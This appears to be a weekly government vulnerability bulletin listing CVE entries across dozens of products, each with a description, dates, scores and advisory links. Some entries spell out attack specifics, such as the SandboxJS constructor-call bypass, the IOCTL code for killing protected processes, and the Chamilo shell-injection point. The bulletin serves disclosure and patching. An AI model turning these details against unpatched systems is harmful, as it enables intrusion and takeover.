| Snipe-it[.]com--Snipe-IT asset management v8.3.0 | Cross-Site Scripting vulnerability in the Snipe-IT web-based asset management system v8.3.0 to up and including v8.3.1 allows authenticated attacker with lowest privileges sufficient only to log in, to inject arbitrary JavaScript code via "Name" and "Surname" fields. The JavaScript code is executed whenever "Activity Report" or modified profile is viewed directly by any user with sufficient permissions. Successful exploitation of this issue requires that the profile's "Display Name" is not set. The vulnerability is fixed in v8.3.2. | 2026-04-13 | not yet calculated | CVE-2025-63743 | http://grokability.com http://snipe-it.com https://github.com/grokability/snipe-it/commit/b6d397bcca4e8a05176b782de769d7160058bfc4#diff-7fe056d76c09808dac923c4639161d587c3fff281a01122f3e10c4a781674a65 https://github.com/mikust/CVEs/tree/main/CVE-2025-63743 |
| n/a-- hotel-management-php version 1.0 | alandsilva26 hotel-management-php 1.0 is vulnerable to Cross Site Scripting (XSS) in /public/admin/edit_room.php which allows an attacker to inject and execute arbitrary JavaScript via the room_id GET parameter. | 2026-04-14 | not yet calculated | CVE-2025-65132 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65132/README.md |
| n/a--School Management System v1.0 | A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information. | 2026-04-14 | not yet calculated | CVE-2025-65133 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65133/README.md |
| n/a--School Management System v1.0 | In manikandan580 School-management-system 1.0, a reflected cross-site scripting (XSS) vulnerability exists in /studentms/admin/contact-us.php via the email POST parameter. | 2026-04-14 | not yet calculated | CVE-2025-65134 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65134/README.md |
| n/a--School Management System v1.0 | In manikandan580 School-management-system 1.0, a reflected XSS vulnerability exists in /studentms/admin/contact-us.php via the pagedes POST parameter. | 2026-04-14 | not yet calculated | CVE-2025-65136 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65136/README.md |
| Apache Software Foundation--Apache Airflow | Before Airflow 3.2.0, it was unclear that secure Airflow deployments require the Deployment Manager to take appropriate actions and pay attention to security details and the security model of Airflow. Some assumptions the Deployment Manager could make were not clear or explicit enough, even though Airflow's intentions and security model did not suggest different assumptions. The overall security model [1], workload isolation [2], and JWT authentication details [3] are now described in more detail. Users concerned with role isolation and following the Airflow security model are advised to upgrade to Airflow 3.2, where several security improvements have been implemented. They should also read and follow the relevant documents to make sure that their deployment is secure enough. It also clarifies that the Deployment Manager is ultimately responsible for securing your Airflow deployment. This had also been communicated via the Airflow 3.2.0 Blog announcement [4]. [1] Security Model: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html [2] Workload isolation: https://airflow.apache.org/docs/apache-airflow/stable/security/workload.html [3] JWT Token authentication: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html [4] Airflow 3.2.0 Blog announcement: https://airflow.apache.org/blog/airflow-3.2.0/ Users are recommended to upgrade to version 3.2.0, which fixes this issue. | 2026-04-13 | not yet calculated | CVE-2025-66236 | https://github.com/apache/airflow/pull/58662 https://lists.apache.org/thread/g8fyy1tkmxkkfk7tx2v6h8mvwzpyykbo |
| gonitro[.]com-- Nitro PDF Pro v14.41.1.4 | A NULL pointer dereference in Nitro PDF Pro for Windows v14.41.1.4 allows attackers to cause a Denial of Service (DoS) via a crafted XFA packet. | 2026-04-13 | not yet calculated | CVE-2025-66769 | https://www.gonitro.com/ https://jeroscope.com/advisories/2025/jero-2025-015/ |
| nordicsemi[.]no--IronSide SE | Nordic Semiconductor IronSide SE for nRF54H20 before 23.0.2+17 has an Algorithmic complexity issue. | 2026-04-15 | not yet calculated | CVE-2025-67841 | https://nordicsemi.no https://docs.nordicsemi.com/bundle/SA/resource/SA-2025-447-v1.1.pdf |
| gonitro[.]com-- Nitro PDF Pro v14.41.1.4 | Nitro PDF Pro for Windows 14.41.1.4 contains a NULL pointer dereference vulnerability in the JavaScript implementation of app.alert(). When app.alert() is called with more than one argument and the first argument evaluates to null (for example, app.alert(app.activeDocs, true) when app.activeDocs is null), the engine routes the call through a fallback path intended for non-string arguments. In this path, js_ValueToString() is invoked on the null value and returns an invalid string pointer, which is then passed to JS_GetStringChars() without validation. Dereferencing this pointer leads to an access violation and application crash when opening a crafted PDF. | 2026-04-13 | not yet calculated | CVE-2025-69624 | http://nitro.com |
| gonitro[.]com-- Nitro PDF Pro v14.41.1.4 | Nitro PDF Pro for Windows 14.41.1.4 contains a heap use-after-free vulnerability in the implementation of the JavaScript method this.mailDoc(). During execution, an internal XID object is allocated and then freed prematurely, after which the freed pointer is still passed into UI and logging helper functions. Because the freed memory region may contain unpredictable heap data or remnants of attacker-controlled JavaScript strings, downstream routines such as wcscmp() may process invalid or stale pointers. This can result in access violations and non-deterministic crashes. | 2026-04-13 | not yet calculated | CVE-2025-69627 | http://nitro.com https://jeroscope.com/advisories/2025/jero-2025-016/ |
| trezor[.]com--Trezor One v1.13.0 | A side-channel vulnerability exists in the implementation of BIP-39 mnemonic processing, as observed in Trezor One v1.13.0 to v1.14.0, Trezor T v1.13.0 to v1.14.0, and Trezor Safe v1.13.0 to v1.14.0 hardware wallets. This originates from the BIP-39 standard guidelines, which induce non-constant time execution and specific branch patterns for word searching. An attacker with physical access during the initial setup phase can collect a single side-channel trace. By utilizing profiling-based Deep Learning Side-Channel Analysis (DL-SCA), the attacker can recover the mnemonic code and subsequently steal the assets. The issue was patched. | 2026-04-14 | not yet calculated | CVE-2025-69893 | http://trezor.com https://trezor.io/vulnerability/fix-side-channel-in-bip-39-mnemonic-processing-when-unlocked |
| n/a-- transloadit uppy v0.25.6 | An issue pertaining to CWE-843: Access of Resource Using Incompatible Type was discovered in transloadit uppy v0.25.6. | 2026-04-14 | not yet calculated | CVE-2025-70023 | https://github.com/transloadi https://github.com/transloadit/uppy https://gist.github.com/zcxlighthouse/27926a85371ac5d2291f44903254753e |
| Safetica Application suite-- STProcessMonitor 11.11.4.0 | STProcessMonitor 11.11.4.0, part of the Safetica Application suite, allows an admin-privileged user to send crafted IOCTL requests to terminate processes that are protected through a third-party implementation. Unauthorized processes load the driver and send a crafted IOCTL request (0xB822200C) to terminate those protected processes. This is caused by insufficient caller validation in the driver's IOCTL handler, enabling unauthorized processes to perform termination operations in kernel space. Successful exploitation can lead to denial of service by disrupting critical third-party services or applications. | 2026-04-17 | not yet calculated | CVE-2025-70795 | https://bbs.kafan.cn/thread-2287429-1-1.html https://bbs.kafan.cn/thread-2287429-2-1.html https://www.virustotal.com/gui/file/70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b https://www.virustotal.com/gui/file/9ace6a1e4bee5834be38b4c2fd26780d1fcc18ea9d58224e31d6382c19e53296 https://www.virustotal.com/gui/file/fc3588482f596a067b65d5d64d21fe62463b38a138fc87d8d2350efa86d34284 https://github.com/magicsword-io/LOLDrivers/commit/eea8326bf891d810902203e9ac5cfdeaf5a17a1c https://github.com/magicsword-io/LOLDrivers/issues/268 |
| Vtiger[.]com-- Vtiger CRM 8.4.0 | Vtiger CRM 8.4.0 contains a reflected cross-site scripting (XSS) vulnerability in the MailManager module. Improper handling of user-controlled input in the _folder parameter allows a specially crafted, double URL-encoded payload to be reflected and executed in the context of an authenticated user's session. | 2026-04-13 | not yet calculated | CVE-2025-70936 | https://www.vtiger.com/open-source-crm/ https://www.simonjuguna.com/cve-2025-70936-reflected-xss-vulnerability-in-vtiger-crm-v8-4-0/ |
| Progress Software Corporation--OpenEdge | A vulnerability in the AdminServer component of OpenEdge on all supported platforms grants its authenticated users OS-level access to the server through the adopted authority of the AdminServer process itself. The delegated authority of the AdminServer could allow its users the ability to read arbitrary files on the host system through the misuse of the setFile() and openFile() methods exposed through the RMI interface. Misuse was limited only by OS-level authority of the AdminServer's elevated privileges granted and the user's access to these methods enabled through RMI. The exploitable methods have been removed thus eliminating their access through RMI or downstream of the RMI registry. | 2026-04-14 | not yet calculated | CVE-2025-7389 | https://community.progress.com/s/article/Important-Arbitrary-File-Ready-Security-Update-for-OpenEdge-AdminServer |
| Progress Software Corporation--OpenEdge | The OECH1 prefix encoding is intended to obfuscate values across the OpenEdge platform. It has been identified as cryptographically weak and unsuitable for stored encodings and enterprise applications. OECH1 encodings should be considered exploitable and immediately replaced by any other supported prefix encoding, all of which are based on symmetric encryption. | 2026-04-14 | not yet calculated | CVE-2025-8095 | https://community.progress.com/s/article/Unintended-Use-of-OECH1-for-Password-Secrets-Protection |
| PureStorage--FlashBlade | A vulnerability exists in FlashBlade whereby sensitive information may be logged under specific conditions. | 2026-04-14 | not yet calculated | CVE-2026-0207 | https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html |
| PureStorage--FlashArray | Under certain administrative conditions, FlashArray Purity may apply snapshot retention policies earlier or later than configured. | 2026-04-14 | not yet calculated | CVE-2026-0209 | https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html |
| Palo Alto Networks--Cortex XDR Agent | A problem with a protection mechanism in the Palo Alto Networks Cortex XDR agent on Windows allows a local Windows administrator to disable the agent. This issue may be leveraged by malware to perform malicious activity without detection. | 2026-04-13 | not yet calculated | CVE-2026-0232 | https://security.paloaltonetworks.com/CVE-2026-0232 |
| Palo Alto Networks--Autonomous Digital Experience Manager | A certificate validation vulnerability in Palo Alto Networks Autonomous Digital Experience Manager on Windows allows an unauthenticated attacker with adjacent network access to execute arbitrary code with NT AUTHORITY\SYSTEM privileges. | 2026-04-13 | not yet calculated | CVE-2026-0233 | https://security.paloaltonetworks.com/CVE-2026-0233 |
| Palo Alto Networks--Cortex XSOAR Microsoft Teams Marketplace | An improper verification of cryptographic signature vulnerability exists in Cortex XSOAR and Cortex XSIAM platforms during integration of Microsoft Teams that enables an unauthenticated user to access and modify protected resources. | 2026-04-13 | not yet calculated | CVE-2026-0234 | https://security.paloaltonetworks.com/CVE-2026-0234 |
| Legion of the Bouncy Castle Inc.--BC-JAVA | Improper neutralization of special elements used in an LDAP query ('LDAP injection') vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (prov modules). This vulnerability is associated with program files LDAPStoreHelper. This issue affects BC-JAVA: from 1.74 before 1.84. | 2026-04-15 | not yet calculated | CVE-2026-0636 | https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902026%E2%80%900636 https://github.com/bcgit/bc-java/commit/d20cdb8430e09224114fec0179a71859929fcbde |
| keras-team--keras-team/keras | A vulnerability in the `TFSMLayer` class of the `keras` package, version 3.13.0, allows attacker-controlled TensorFlow SavedModels to be loaded during deserialization of `.keras` models, even when `safe_mode=True`. This bypasses the security guarantees of `safe_mode` and enables arbitrary attacker-controlled code execution during model inference under the victim's privileges. The issue arises due to the unconditional loading of external SavedModels, serialization of attacker-controlled file paths, and the lack of validation in the `from_config()` method. | 2026-04-13 | not yet calculated | CVE-2026-1462 | https://huntr.com/bounties/7e78d6f1-6977-4300-b595-e81bdbda331c https://github.com/keras-team/keras/commit/b6773d3decaef1b05d8e794458e148cb362f163f |
| Pegasystems--Pega Infinity | Pega Platform versions 8.1.0 through 25.1.1 are affected by an HTML Injection vulnerability in a user interface component. Requires a high privileged user with a developer role. | 2026-04-15 | not yet calculated | CVE-2026-1564 | https://support.pega.com/support-doc/pega-security-advisory-b26-vulnerability-remediation-note |
| Pegasystems--Pega Infinity | Pega Platform versions 8.1.0 through 25.1.1 are affected by a Stored Cross-Site Scripting vulnerability in a user interface component. Requires a high privileged user with a developer role. | 2026-04-15 | not yet calculated | CVE-2026-1711 | https://support.pega.com/support-doc/pega-security-advisory-d26-vulnerability-remediation-note |
| ASUS--DriverHub | An Incorrect Permission Assignment for Critical Resource vulnerability in the ASUS DriverHub update process allows privilege escalation due to improper protection of required execution resources during the validation phase, permitting a local user to make unprivileged modifications. This allows the altered resource to pass system checks and be executed with elevated privileges upon a user-initiated update. Refer to the 'Security Update for ASUS DriverHub' section on the ASUS Security Advisory for more information. | 2026-04-16 | not yet calculated | CVE-2026-1880 | https://www.asus.com/security-advisory |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in data related to network restrictions prior to SMR Apr-2026 Release 1 allows physical attackers to bypass the restrictions. | 2026-04-13 | not yet calculated | CVE-2026-21003 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in Samsung DeX prior to SMR Apr-2026 Release 1 allows physical attackers to access hidden notification contents. | 2026-04-13 | not yet calculated | CVE-2026-21006 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Improper check for exceptional conditions in Device Care prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Knox Guard. | 2026-04-13 | not yet calculated | CVE-2026-21007 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Exposure of sensitive information in S Share prior to SMR Apr-2026 Release 1 allows an adjacent attacker to access sensitive information. | 2026-04-13 | not yet calculated | CVE-2026-21008 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Improper check for exceptional conditions in Recents prior to SMR Apr-2026 Release 1 allows a physical attacker to bypass App Pinning. | 2026-04-13 | not yet calculated | CVE-2026-21009 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Incorrect privilege assignment in Bluetooth in Maintenance mode prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Extend Unlock. | 2026-04-13 | not yet calculated | CVE-2026-21011 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | External control of file name in AODManager prior to SMR Apr-2026 Release 1 allows a privileged local attacker to create a file with system privilege. | 2026-04-13 | not yet calculated | CVE-2026-21012 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Galaxy Wearable | Incorrect default permission in Galaxy Wearable prior to version 2.2.68.26 allows local attackers to access sensitive information. | 2026-04-13 | not yet calculated | CVE-2026-21013 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Camera | Improper access control in Samsung Camera prior to version 16.5.00.28 allows a local attacker to access location data. User interaction is required for triggering this vulnerability. | 2026-04-13 | not yet calculated | CVE-2026-21014 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04 |
| Veeam--Backup and Replication | A vulnerability allowing a local attacker with administrator privileges to bypass Windows Driver Signature Enforcement. | 2026-04-17 | not yet calculated | CVE-2026-21709 | https://www.veeam.com/kb4830 https://www.veeam.com/kb4831 |
| CubeCart Limited--CubeCart | An OS command injection vulnerability exists in CubeCart prior to 6.6.0, which may allow a user with an administrative privilege to execute an arbitrary OS command. | 2026-04-17 | not yet calculated | CVE-2026-21719 | https://community.cubecart.com/t/cubecart-6-6-0-released-the-biggest-update-in-years/62405 https://jvn.jp/en/jp/JVN78422311/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to gain write permission to read-only wrapped user-mode memory and files. This is caused by improper handling of GPU memory reservation protections. | 2026-04-17 | not yet calculated | CVE-2026-21733 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Ubiquiti Inc--UniFi Play PowerAmp | An Improper Input Validation vulnerability could allow a malicious actor with access to the UniFi Play network to cause the device to stop responding. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier); UniFi Play Audio Port (Version 1.0.24 and earlier). Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later; update UniFi Play Audio Port to Version 1.1.9 or later. | 2026-04-13 | not yet calculated | CVE-2026-22565 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Microchip--IStaX | A privilege escalation vulnerability in Microchip IStaX allows an authenticated low-privileged user to recover a shared per-device cookie secret from their own webstax_auth session cookie and forge a new cookie with administrative privileges. This issue affects IStaX before 2026.03. | 2026-04-16 | not yet calculated | CVE-2026-2336 | https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/istax-privilege-escalation-via-weak-cookie-authentication |
Vulnerability Summary for the Week of April 6, 2026
Posted on Tuesday April 14, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process. This vulnerability is fixed in 0.8.36. | 2026-04-06 | 10 | CVE-2026-34208 | https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj |
| Davidtavarez--CF Image Hosting Script | CF Image Hosting Script 1.6.5 allows unauthenticated attackers to download and decode the application database by accessing the imgdb.db file in the upload/data directory. Attackers can extract delete IDs stored in plaintext from the deserialized database and use them to delete all pictures via the d parameter. | 2026-04-12 | 9.8 | CVE-2019-25709 | ExploitDB-46094 Official Product Homepage Product Reference VulnCheck Advisory: CF Image Hosting Script 1.6.5 Unauthorized Database Access |
| Beijing Topsec Network Security Technology Co., Ltd.--Tianxin Internet Behavior Management System | Tianxin Internet Behavior Management System contains a command injection vulnerability in the Reporter component endpoint that allows unauthenticated attackers to execute arbitrary commands by supplying a crafted objClass parameter containing shell metacharacters and output redirection. Attackers can exploit this vulnerability to write malicious PHP files into the web root and achieve remote code execution with the privileges of the web server process. This vulnerability has been fixed in version NACFirmware_4.0.0.7_20210716.180815_topsec_0_basic.bin. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-06-01 (UTC). | 2026-04-07 | 9.8 | CVE-2021-4473 | https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972 https://www.cnvd.org.cn/patchInfo/show/280166 https://cn-sec.com/archives/4631959.html https://avd.aliyun.com/detail?id=AVD-2021-890232 https://www.vulncheck.com/advisories/tianxin-internet-behavior-management-system-command-injection-via-toquery-php |
| Contemporary Controls--BASControl20 | An attacker could use data obtained by sniffing the network traffic to forge packets in order to make arbitrary requests to Contemporary Controls BASC 20T. | 2026-04-09 | 9.8 | CVE-2025-13926 | https://www.ccontrols.com/support/contacttech.htm https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-099-01.json |
| SaturdayDrive--Ninja Forms - File Uploads | The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27. | 2026-04-07 | 9.8 | CVE-2026-0740 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab50-486a-9337-97ee9f452f12?source=cve https://ninjaforms.com/extensions/file-uploads/ |
| IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to escalate their privileges to root due to execution with more privileges than required. | 2026-04-08 | 9.3 | CVE-2026-1346 | https://www.ibm.com/support/pages/node/7268253 |
| davidfcarr--Quick Playground | The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server. | 2026-04-09 | 9.8 | CVE-2026-1830 | https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39 https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail= |
| LibRaw--LibRaw | A heap-based buffer overflow vulnerability exists in the x3f_thumb_loader functionality of LibRaw Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 9.8 | CVE-2026-20889 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2358 |
| LibRaw--LibRaw | A heap-based buffer overflow vulnerability exists in the HuffTable::initval functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 9.8 | CVE-2026-20911 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2330 |
| LibRaw--LibRaw | A heap-based buffer overflow vulnerability exists in the lossless_jpeg_load_raw functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 9.8 | CVE-2026-21413 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2331 |
| Weaver Network Co., Ltd.--E-cology | Weaver (Fanwei) E-cology 10.0 versions prior to 20260312 contain an unauthenticated remote code execution vulnerability in the /papi/esearch/data/devops/dubboApi/debug/method endpoint that allows attackers to execute arbitrary commands by invoking exposed debug functionality. Attackers can craft POST requests with attacker-controlled interfaceName and methodName parameters to reach command-execution helpers and achieve arbitrary command execution on the system. Exploitation evidence was first observed by the Shadowserver Foundation on 2026-03-31 (UTC). | 2026-04-07 | 9.8 | CVE-2026-22679 | https://www.weaver.com.cn/cs/securityDownload.html# https://h4cker.zip/post/d5d211/ https://ti.qianxin.com/vulnerability/notice-detail/1760 https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-via-dubboapi-debug-endpoint |
| prosolution--ProSolution WP Client | The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-04-08 | 9.8 | CVE-2026-2942 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=cve https://plugins.trac.wordpress.org/browser/prosolution-wp-client/trunk/public/class-prosolwpclient-public.php?rev=3331282#L993 https://plugins.trac.wordpress.org/changeset/3484577/prosolution-wp-client |
| Rukovoditel--Rukovoditel CRM | A reflected cross-site scripting (XSS) vulnerability exists in Rukovoditel CRM version 3.6.4 and earlier in the Zadarma telephony API endpoint (/api/tel/zadarma.php). The application directly reflects user-supplied input from the 'zd_echo' GET parameter into the HTTP response without proper sanitization, output encoding, or content-type restrictions. The vulnerable code is: if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']); An unauthenticated attacker can exploit this issue by crafting a malicious URL containing JavaScript payloads. When a victim visits the link, the payload executes in the context of the application within the victim's browser, potentially leading to session hijacking, credential theft, phishing, or account takeover. The issue is fixed in version 3.7, which introduces proper input validation and output encoding to prevent script injection. | 2026-04-11 | 9.3 | CVE-2026-31845 | https://forum.rukovoditel.net/viewtopic.php?p=22499#p22499 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter - which only passes through Security::remove_XSS() (an HTML-only filter) - is concatenated directly into shell commands such as exec("mv $source $target"). By default, Chamilo allows all authenticated users to create courses (allow_users_to_create_courses = true). Any user who is a teacher in a course (including self-created courses) can move documents, making this vulnerability exploitable by any authenticated user. The attacker must first place a directory with shell metacharacters in its name on the filesystem (achievable via Course Backup Import), then move a document into that directory to trigger arbitrary command execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 9.1 | CVE-2026-32892 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1 |
| wpeverest--Everest Forms Contact Form, Payment Form, Quiz, Survey & Custom Form Builder | The Everest Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.3 via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP's native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions. | 2026-04-08 | 9.8 | CVE-2026-3296 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae37-790d-4b18-a9ec-054c8c27b8bc?source=cve https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/admin/views/html-admin-page-entries-view.php#L133 https://plugins.trac.wordpress.org/browser/everest-forms/trunk/includes/admin/views/html-admin-page-entries-view.php#L133 https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/evf-core-functions.php#L5594 https://plugins.trac.wordpress.org/changeset/3489938/everest-forms/tags/3.4.4/readme.txt?old=3464753&old_path=everest-forms%2Ftags%2F3.4.3%2Freadme.txt https://plugins.trac.wordpress.org/changeset?old_path=/everest-forms/tags/3.4.3&new_path=/everest-forms/tags/3.4.4 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 9.4 | CVE-2026-33707 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2 https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8 https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c |
| Juniper Networks--JSI LWC | A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible. This issue affects all versions of vLWC before 3.0.94. | 2026-04-09 | 9.8 | CVE-2026-33784 | https://kb.juniper.net/JSA107871 |
| Canonical--lxd | Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root. | 2026-04-09 | 9.1 | CVE-2026-34177 | VM lowlevel restriction bypass via raw.apparmor and raw.qemu.conf lxd: Prevent use of raw.apparmor and raw.qemu.conf when low level options are blocked |
| Canonical--lxd | In Canonical LXD before 6.8, the backup import path validates project restrictions against backup/index.yaml in the supplied tar archive but creates the instance from backup/container/backup.yaml, a separate file in the same archive that is never checked against project restrictions. An authenticated remote attacker with instance-creation permission in a restricted project can craft a backup archive where backup.yaml carries restricted settings such as security.privileged=true or raw.lxc directives, bypassing all project restriction enforcement and allowing full host compromise. | 2026-04-09 | 9.1 | CVE-2026-34178 | Importing a crafted backup leads to project restriction bypass Import: Create backup config from index |
| Canonical--lxd | In Canonical LXD versions 4.12 through 6.7, the doCertificateUpdate function in lxd/certificates.go does not validate the Type field when handling PUT/PATCH requests to /1.0/certificates/{fingerprint} for restricted TLS certificate users, allowing a remote authenticated attacker to escalate privileges to cluster admin. | 2026-04-09 | 9.1 | CVE-2026-34179 | Update of type field in restricted TLS certificate allows privilege escalation to cluster admin Improve validation on certificate edit |
| Nextendweb--Smart Slider 3 Pro for WordPress | Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hidden administrator accounts, exfiltrate credentials and access keys, and maintain persistence through multiple injection points including must-use plugins and core file modifications. | 2026-04-09 | 9.8 | CVE-2026-34424 | https://smartslider.helpscoutdocs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35-compromise https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory-smart-slider-3-pro-3-5-1-35-compromise https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/ 